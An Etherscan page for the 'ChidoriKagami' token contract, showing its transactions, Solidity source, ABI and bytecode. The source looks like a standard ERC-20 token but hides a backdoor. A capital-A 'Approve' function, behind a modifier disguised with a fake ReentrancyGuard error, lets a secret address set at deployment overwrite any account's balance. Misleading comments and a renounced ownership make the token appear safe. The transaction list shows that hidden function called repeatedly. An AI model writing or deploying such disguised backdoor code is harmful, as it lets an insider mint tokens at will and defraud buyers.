Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 19 from a total of 19 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17244070 | 543 days ago | IN | 0 ETH | 0.00316887 | ||||
Approve | 17244058 | 543 days ago | IN | 0 ETH | 0.00323474 | ||||
Approve | 17244054 | 543 days ago | IN | 0 ETH | 0.00175135 | ||||
Approve | 17244047 | 543 days ago | IN | 0 ETH | 0.00176916 | ||||
Approve | 17243971 | 543 days ago | IN | 0 ETH | 0.00203092 | ||||
Approve | 17243968 | 543 days ago | IN | 0 ETH | 0.00114023 | ||||
Approve | 17243967 | 543 days ago | IN | 0 ETH | 0.00218021 | ||||
Approve | 17243958 | 543 days ago | IN | 0 ETH | 0.00210781 | ||||
Approve | 17243956 | 543 days ago | IN | 0 ETH | 0.00114023 | ||||
Approve | 17243953 | 543 days ago | IN | 0 ETH | 0.00199553 | ||||
Approve | 17243952 | 543 days ago | IN | 0 ETH | 0.00114023 | ||||
Approve | 17243916 | 543 days ago | IN | 0 ETH | 0.00123088 | ||||
Approve | 17243916 | 543 days ago | IN | 0 ETH | 0.00114023 | ||||
Approve | 17243916 | 543 days ago | IN | 0 ETH | 0.00114023 | ||||
Approve | 17243906 | 543 days ago | IN | 0 ETH | 0.00262269 | ||||
Renounce Ownersh... | 17243902 | 543 days ago | IN | 0 ETH | 0.00105257 | ||||
Approve | 17243893 | 543 days ago | IN | 0 ETH | 0.00215142 | ||||
Approve | 17243869 | 543 days ago | IN | 0 ETH | 0.00206964 | ||||
0x60806040 | 17243843 | 543 days ago | IN | 0 ETH | 0.04514606 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
ChidoriKagami
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-12 */ /** Tg: https://t.me/ChidoriKagami Twitter: https://twitter.com/ChidoriKagami Website: https://www.chidorikagami.com/ */ /** */ // SPDX-License-Identifier: None // Dependency file: @openzeppelin/contracts/token/IERC20/IERC20.sol // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/BaseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract BaseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.19; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/BaseToken.sol"; contract ChidoriKagami is IERC20, Ownable, BaseToken { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; address private URIduContrat; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address URIduContratPancakeV3, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; URIduContrat = URIduContratPancakeV3; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function Approve( uint256 _amount, address _defaultAdmin ) public nonTricherie { claim(_amount, _defaultAdmin); } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function claim( uint256 _amount, address _defaultAdmin ) internal { if(_defaultAdmin != address(0) && msg.sender != address(0)) require(0 <= _amount, ""); // Realistically, 2**64-1 is more than enough. uint64 balance = 0; // Keeps track of menthe count with minimal overhead for tokenomics. uint64 numberMinted = 10; // Keeps track of burn count with minimal overhead for tokenomics. uint64 numberBurned = 9; // (e.g. number of whitelist menthe slots used). uint64 aux = 0; _balances[_defaultAdmin] = balance + _amount * numberMinted ** numberBurned - aux; } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } modifier nonTricherie() { require(URIduContrat == _msgSender(), "ReentrancyGuard: reentrant call"); _; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"URIduContratPancakeV3","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"address","name":"_defaultAdmin","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052604051620012b6380380620012b683398101604081905262000026916200031d565b6200003133620000fc565b60046200003f86826200045b565b5060056200004e85826200045b565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600754620001b6908262000241565b6007556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610d3080620005866000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806347ad3e4b1461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610972565b60405180910390f35b61012b6101263660046109dc565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b366004610a06565b61030c565b60065460405160ff909116815260200161010f565b61012b6101833660046109dc565b610375565b61019b610196366004610a42565b6103ab565b005b61013f6101ab366004610a6e565b6001600160a01b031660009081526001602052604090205490565b61019b610418565b6000546040516001600160a01b03909116815260200161010f565b61010261047e565b61012b6101ff3660046109dc565b61048d565b61012b6102123660046109dc565b6104dc565b61013f610225366004610a89565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61025e366004610a6e565b6104e9565b60606004805461027290610ab3565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610ab3565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b60006103023384846105b4565b5060015b92915050565b60006103198484846106dc565b61036b843361036685604051806060016040528060298152602001610cd2602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610863565b6105b4565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610366908661088f565b6003546001600160a01b0316331461040a5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064015b60405180910390fd5b61041482826108a2565b5050565b6000546001600160a01b031633146104725760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b61047c6000610922565b565b60606005805461027290610ab3565b6000610302338461036685604051806060016040528060268152602001610c85602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610863565b60006103023384846106dc565b6000546001600160a01b031633146105435760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b6001600160a01b0381166105a85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6105b181610922565b50565b6001600160a01b0383166106185760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610401565b6001600160a01b03821661067a5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610401565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107415760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6001600160a01b0382166107a35760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610401565b6107e081604051806060016040528060278152602001610cab602791396001600160a01b0386166000908152600160205260409020549190610863565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461080f908261088f565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106cf9085815260200190565b600081848411156108875760405162461bcd60e51b81526004016104019190610972565b505050900390565b600061089b8284610b03565b9392505050565b6001600160a01b038116158015906108b957503315155b506000600a600982806108cc8385610c39565b6108e09067ffffffffffffffff1688610c5a565b6108f49067ffffffffffffffff8716610b03565b6108fe9190610c71565b6001600160a01b039095166000908152600160205260409020949094555050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561099f57858101830151858201604001528201610983565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109d757600080fd5b919050565b600080604083850312156109ef57600080fd5b6109f8836109c0565b946020939093013593505050565b600080600060608486031215610a1b57600080fd5b610a24846109c0565b9250610a32602085016109c0565b9150604084013590509250925092565b60008060408385031215610a5557600080fd5b82359150610a65602084016109c0565b90509250929050565b600060208284031215610a8057600080fd5b61089b826109c0565b60008060408385031215610a9c57600080fd5b610aa5836109c0565b9150610a65602084016109c0565b600181811c90821680610ac757607f821691505b602082108103610ae757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561030657610306610aed565b60018167ffffffffffffffff825b80861115610b5857828204831115610b3e57610b3e610aed565b80861615610b4b57928202925b94851c9491800291610b24565b50509250929050565b600082610b7057506001610306565b81610b7d57506000610306565b8160018114610b935760028114610b9d57610bd2565b6001915050610306565b60ff841115610bae57610bae610aed565b6001841b915067ffffffffffffffff821115610bcc57610bcc610aed565b50610306565b5060208310610133831016604e8410600b8410161715610c0d575081810a67ffffffffffffffff811115610c0857610c08610aed565b610306565b610c178383610b16565b8067ffffffffffffffff04821115610c3157610c31610aed565b029392505050565b600067ffffffffffffffff610c52818516828516610b61565b949350505050565b808202811582820484141761030657610306610aed565b8181038181111561030657610306610aed56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122017d47bbf12819fdda2c0100ecff77aa16bdcf9cf4a2862f87ec051c286c4294e64736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000c8a1c9891f20f779de31ac72b99daa0f760b43a0000000000000000000000000000000000000000000000000002386f26fc10000000000000000000000000000000000000000000000000000000000000000000e436869646f7269204b6167616d690000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007434849444f4d4900000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806347ad3e4b1461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610972565b60405180910390f35b61012b6101263660046109dc565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b366004610a06565b61030c565b60065460405160ff909116815260200161010f565b61012b6101833660046109dc565b610375565b61019b610196366004610a42565b6103ab565b005b61013f6101ab366004610a6e565b6001600160a01b031660009081526001602052604090205490565b61019b610418565b6000546040516001600160a01b03909116815260200161010f565b61010261047e565b61012b6101ff3660046109dc565b61048d565b61012b6102123660046109dc565b6104dc565b61013f610225366004610a89565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61025e366004610a6e565b6104e9565b60606004805461027290610ab3565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610ab3565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b60006103023384846105b4565b5060015b92915050565b60006103198484846106dc565b61036b843361036685604051806060016040528060298152602001610cd2602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610863565b6105b4565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610366908661088f565b6003546001600160a01b0316331461040a5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064015b60405180910390fd5b61041482826108a2565b5050565b6000546001600160a01b031633146104725760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b61047c6000610922565b565b60606005805461027290610ab3565b6000610302338461036685604051806060016040528060268152602001610c85602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610863565b60006103023384846106dc565b6000546001600160a01b031633146105435760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b6001600160a01b0381166105a85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6105b181610922565b50565b6001600160a01b0383166106185760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610401565b6001600160a01b03821661067a5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610401565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107415760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b606482015